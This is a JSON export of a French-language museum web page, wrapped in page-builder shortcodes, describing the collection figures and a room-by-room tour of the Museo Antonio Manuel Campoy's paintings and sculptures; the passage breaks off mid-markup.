{"id":640,"date":"2021-10-18T07:00:44","date_gmt":"2021-10-18T07:00:44","guid":{"rendered":"http:\/\/localhost\/museo\/?page_id=640"},"modified":"2021-11-12T11:02:39","modified_gmt":"2021-11-12T11:02:39","slug":"collections","status":"publish","type":"page","link":"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/","title":{"rendered":"Collections"},"content":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633342900444{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb729&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space][vc_column_text]<\/p>\n<h1><strong>Le Mus\u00e9e Antonio Manuel Campoy (MAMC) en chiffres.<\/strong><\/h1>\n<p>[\/vc_column_text][vc_column_text]<\/p>\n<h5><span class=\"capitalLetter\">A<\/span>u sein de ce que l&rsquo;on peut appeler des \u0153uvres, on distinguera deux modalit\u00e9s principales en ce qui concerne la praticit\u00e9 : <strong>les peintures et les sculpture<\/strong>s, et au sein des premi\u00e8res on suivra les crit\u00e8res du catalogue qui les classe d&rsquo;une part en \u00ab\u00a0<strong>Peinture, dessin et gravure<\/strong>\u00a0\u00bb et , d&rsquo;autre part, dans les \u00ab\u00a0<strong>Dossiers Gravures et eaux-fortes<\/strong>\u00ab\u00a0, en compl\u00e9ment de la troisi\u00e8me section des \u00ab\u00a0<strong>Sculptures<\/strong>\u00ab\u00a0.<\/h5>\n<h5>Nous avons proc\u00e9d\u00e9 \u00e0 la confrontation des diff\u00e9rents inventaires des \u0153uvres donn\u00e9es par la <strong> famille Campoy <\/strong> avec ceux inscrits au catalogue et \u00e0 l&rsquo;examen pi\u00e8ce par pi\u00e8ce, aboutissant \u00e0 la num\u00e9rotation donn\u00e9e \u00e0 certaines d&rsquo;entre elles, plus que de une peinture typique, c&rsquo;\u00e9tait, par exemple, un blason de famille, une photo ou un texte \u00e9crit, oui, encadr\u00e9. Cela fait que le total <strong> d&rsquo;images dans l&rsquo;inventaire est de 393 <\/strong>, alors qu&rsquo;en r\u00e9alit\u00e9 <strong> il y en a 390 <\/strong> qui peuvent \u00eatre consid\u00e9r\u00e9es comme telles<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_single_image image=\u00a0\u00bb333&Prime; img_size=\u00a0\u00bb750&#215;247&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>Tableau 1 : Nombre d&rsquo;\u0153uvres du MAMC<\/strong><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633342994643{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h1><strong>Visite du mus\u00e9e du MAMC.<\/strong><\/h1>\n<p>[\/vc_column_text][vc_column_text]<\/p>\n<h5>Lorsque le palais du marquis a \u00e9t\u00e9 restaur\u00e9 et que nous nous sommes pr\u00e9par\u00e9s \u00e0 accrocher les tableaux sur ses murs, ainsi que le placement des sculptures, <strong>Rosita<\/strong> et <strong>Anastasio<\/strong> ont exprim\u00e9 leur id\u00e9e que leur distribution et leur ordre dans les espaces d&rsquo;exposition ne devraient pas suivre les crit\u00e8res de le mus\u00e9e Il est conventionnel de regrouper les \u0153uvres par leurs styles artistiques, mais plut\u00f4t que leur agencement se fasse comme dans un environnement domestique, dans lequel on place <strong>un tableau impressionniste \u00e0 c\u00f4t\u00e9 d&rsquo;un cubiste<\/strong>, par exemple, <strong>align\u00e9<\/strong> avec un <strong>hyper- travail r\u00e9alist<\/strong>e, cet autre exemple en vaut \u00e9galement la peine. , et sans laisser des murs vides avec presque pas de tableaux suspendus. Un endroit que nous pourrions appeler familier, comme si entrer dans le mus\u00e9e \u00e9tait similaire \u00e0 entrer dans la maison Campoy elle-m\u00eame, pleine de pi\u00e8ces des artistes les plus \u00e9minents de l&rsquo;art contemporain espagnol du 20e si\u00e8cle.<\/h5>\n<h5>Dans le mus\u00e9e, on peut distinguer <strong>dix-sept espaces<\/strong>, dont quatre correspondent aux quatre bastions semi-cylindriques aux quatre coins du rez-de-chauss\u00e9e, qui en temps de paix servaient \u00e0 stocker la poudre. Comme nous le verrons, certains de ces espaces, bien qu&rsquo;avec des usages initialement assign\u00e9s diff\u00e9rents, ont \u00e9galement fini par servir de salle d&rsquo;exposition \u00e9tant donn\u00e9 le nombre \u00e9lev\u00e9 d&rsquo;\u0153uvres donn\u00e9es par la famille Campoy<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_single_image image=\u00a0\u00bb340&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633342994643{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h1><strong>Les chambres.<\/strong><\/h1>\n<p>[\/vc_column_text][vc_column_text]<\/p>\n<h5>De la <strong>salle 1 ou hall<\/strong>, o\u00f9 l&rsquo;on trouve d\u00e9j\u00e0 quelques tableaux suspendus, <strong>la salle 2 s&rsquo;ouvre \u00e0 gauche<\/strong>, qui \u00e0 l&rsquo;ouverture du mus\u00e9e \u00e9tait destin\u00e9e \u00e0 \u00eatre consacr\u00e9e aux expositions temporaires, mais qui, en raison du grand nombre de pi\u00e8ces, <strong>est devenue une salle d&rsquo;exposition et un magasin de livres<\/strong> de la biblioth\u00e8que Antonio Manuel Campoy.<\/h5>\n<h5>Dans cette salle, encore non expos\u00e9e, se trouve le dossier num\u00e9ro 11 de dix eaux-fortes et lithographies r\u00e9alis\u00e9es par le peintre Marola, avec des textes\/hommages au peintre de diff\u00e9rents critiques d&rsquo;art, dont Antonio Manuel Campoy. Et sur ses murs, on peut \u00e9galement voir l&rsquo;\u0153uvre \u00ab<strong>Abstracci\u00f3n<\/strong>\u00bb, de <strong>Mercedes G\u00f3mez Pablos<\/strong>, une composition expressive, r\u00e9alis\u00e9e avec une technique mixte. Et tout pr\u00e8s, un petit tableau du peintre indalien et alm\u00e9rien <strong>Francisco Capuleto<\/strong>, qui nous dessine des \u00ab<strong>Toreros<\/strong>\u00bb \u00e0 la plume, dans un style expressionniste.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb346&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>G\u00d3MEZ PABLOS, Mercedes<\/strong><br \/>\n<em><strong>Abstracci\u00f3n<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb348&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>CAPULETO, Francisco<\/strong><br \/>\n<em><strong>Toreros<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633358213719{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>\u00c0 droite du hall s&rsquo;ouvre la salle de r\u00e9union, transform\u00e9e en <strong>salle 3<\/strong>, o\u00f9 l&rsquo;on peut voir d&rsquo;autres peintures, dont la <strong>gravure d&rsquo;une femme<\/strong>, dans laquelle son auteur, <strong>Mat\u00edas Quetglas<\/strong>, s&rsquo;engage pour le r\u00e9alisme.<\/h5>\n<h5>De retour dans le hall, devant l&rsquo;entr\u00e9e, on acc\u00e8de au patio int\u00e9rieur, <strong>salle 4<\/strong> , o\u00f9 sont \u00e9galement accroch\u00e9es quelques oeuvres, et, derri\u00e8re sa porte vitr\u00e9e, dans <strong>salle 9<\/strong> on peut contempler, la peinture de <strong>Francisco Abuja<\/strong> \u00ab<strong>El arte alimenta la paz<\/strong>\u00bb , une \u0153uvre figurative, r\u00e9alis\u00e9e \u00e0 l&rsquo;huile sur toile, dans laquelle son auteur montre sa tendance \u00e0 l&rsquo;imagination et au symbolisme.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb353&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>QUETGLAS, Mat\u00edas<\/strong><br \/>\n<em><strong>Dibujo de mujer<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb355&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>ABUJA, Francisco Manuel<\/strong><br \/>\n<em><strong>El arte alimenta la paz<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633357948321{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>Dans la <strong>salle 10<\/strong>, nous pouvons voir une petite \u0153uvre caract\u00e9ristique d&rsquo;un <strong>paysage<\/strong> du peintre indien d&rsquo;Almer\u00eda <strong>Miguel Cant\u00f3n Checa<\/strong>. Cette \u0153uvre figurative est un exemple caract\u00e9ristique de la technique de son auteur pour peindre le paysage d&rsquo;Almeria comme peu d&rsquo;autres, avec son c\u00e9l\u00e8bre \u00ab<strong>Chanca<\/strong>s\u00bb, dans lequel se d\u00e9tache la lumi\u00e8re m\u00e9diterran\u00e9enne.<\/h5>\n<h5>Dans la m\u00eame salle se d\u00e9tache la magnifique huile sur toile de <strong> Mar\u00eda \u00c1ngeles Armas Marcelo <\/strong> intitul\u00e9e <strong> \u00abSigno y quimera\u00bb <\/strong>, une \u0153uvre surr\u00e9aliste pleine de symbolisme. Et sur le m\u00eame mur, on s&rsquo;arr\u00eate \u00e0 la <strong> \u00abPuerta de Purchena\u00bb <\/strong>, une aquarelle du peintre paysagiste de Cueva <strong> Jos\u00e9 Antonio Canteras Alonso <\/strong>, et \u00e0 la <strong> \u00abMujer tumbada\u00bb <\/strong>, une \u0153uvre figurative \u00e0 l&rsquo;huile sur toile de <strong> Ricardo Serny <\/strong>.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb357&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>CANT\u00d3N CHECA, Miguel<\/strong><br \/>\n<em><strong>Paisaje<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb359&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>ARMAS MARCELO, M\u00aa \u00c1ngeles<\/strong><br \/>\n<em><strong>Signo y quimeras<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb361&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>CANTERAS ALONSO, Jose Antonio<\/strong><br \/>\n<em><strong>Puerta de Purchena<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/4&Prime;][vc_single_image image=\u00a0\u00bb363&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>SERNY, Ricardo<\/strong><br \/>\n<em><strong>Mujer tumbada<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633358334718{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>Dans cette salle, dans quatre vitrines, certaines des planches du <strong> premier des gravures et dossiers d&rsquo;eaux-fortes (par Javier Clavo), troisi\u00e8me (par Maruja Mallo), quatri\u00e8me (par Albert Duce) et sixi\u00e8me sont conserv\u00e9es et expos\u00e9es ( par Enrique Cortina et Arregui) <\/strong>.<\/h5>\n<h5>En montant les escaliers jusqu&rsquo;au premier \u00e9tage, nous pouvons voir deux \u0153uvres d&rsquo;avant-garde. Tout d&rsquo;abord, la s\u00e9rigraphie <strong> \u00ab Dados \u00bb <\/strong> du hongrois <strong> V\u00edctor Vassarely <\/strong>, une belle composition g\u00e9om\u00e9trique d&rsquo;art optique, dans laquelle le dynamisme lin\u00e9aire et poly\u00e9drique est combin\u00e9 avec une combinaison chromatique limit\u00e9e calcul\u00e9e pour blanc, rouge et noir. Et deuxi\u00e8mement, le travail de la bulgare <strong> Mar\u00eda Droc \u00abJuegos \u00f3pticos\u00bb <\/strong> nous apporte une fois de plus l&rsquo;air innovant de la modernit\u00e9 avec les pi\u00e8ces qui composent un tableau-objet.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb366&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>VASSARELY, Victor<\/strong><br \/>\n<em><strong>Dados<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb368&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>DROC, Mar\u00eda<\/strong><br \/>\n<em><strong>Juegos \u00f3pticos<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633357936634{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>On pourrait appeler <strong> salle 11 <\/strong> les <strong> portraits de la famille Campoy <\/strong>, quelques peintures \u00e0 l&rsquo;huile sur toile de <strong> Anastasio <\/strong>, peintes <strong> par Joaqu\u00edn Canovas ; de Rosita, de Guillermo Vargas Ruiz, et d&rsquo;Antonio Manuel, d&rsquo;Antonio Bisquert <\/strong>. Dans la m\u00eame salle on peut \u00e9galement appr\u00e9cier le magnifique <strong> \u00abPrimavera\u00bb <\/strong> de <strong> Enrique Padiel <\/strong>, une v\u00e9ritable explosion de couleurs dans des coups de pinceau quasi-impressionnistes mais dans une \u0153uvre figurative, et l&rsquo;\u0153uvre par <strong>Jes\u00fas de Perceval <\/strong>, \u00e0 l&rsquo;encaustique, <strong> \u00abCabeza de mujer. Tristeza \u00bb<\/strong>.<\/h5>\n<h5>Aussi tr\u00e8s int\u00e9ressante est la <strong> sculpture de Venancio Blanco de \u00abSanta Teresa\u00bb <\/strong>, en bronze coul\u00e9, de style post-cubiste, avec laquelle l&rsquo;artiste est devenu le ma\u00eetre de la nouvelle sculpture religieuse<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb371&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PADIAL, Enrique<\/strong><br \/>\n<em><strong>Primavera<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb373&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>BLANCO, Venancio<\/strong><br \/>\n<em><strong>Santa Teresa<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb318&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PERCEVAL, Jesus de<\/strong><br \/>\n<em><strong>Cabeza de mujer \u00ab\u00a0Tristeza\u00a0\u00bb<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633357984940{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h5>La <strong> salle 12 <\/strong> est domin\u00e9e par une huile sur toile, reposant sur un chevalet, de <strong> Pilar de Aristegui <\/strong>, <strong> \u00abFerias-Kenya\u00bb <\/strong>, de style na\u00eff , dans la lign\u00e9e du paradis recr\u00e9ant de l&rsquo;artiste avec une ing\u00e9niosit\u00e9 suggestive.<\/h5>\n<h5>Trois vitrines contiennent trois dossiers de gravures et eaux-fortes : <strong> le deuxi\u00e8me (par Guillermo Vargas Ru\u00edz), le septi\u00e8me (par Vicente Arn\u00e1s) et le huiti\u00e8me (par Carmen Lastra) <\/strong>.<\/h5>\n<h5>Dans la m\u00eame pi\u00e8ce, <strong> le disciple de Perceval Francisco Alcaraz <\/strong>, dans son huile sur toile <strong> \u00abNi\u00f1a\u00bb <\/strong> fait une exaltation color\u00e9e caract\u00e9ristique du mouvement indalien.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=\u00a0\u00bbrow\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb376&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb style=\u00a0\u00bbvc_box_shadow_3d\u00a0\u00bb onclick=\u00a0\u00bblink_image\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb qode_hover_animation=\u00a0\u00bbzoom_in\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>ARISTEGUI, Pilar de<\/strong><br \/>\n<em><strong>Ferias Kenia<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/5&Prime;][vc_single_image image=\u00a0\u00bb316&Prime; 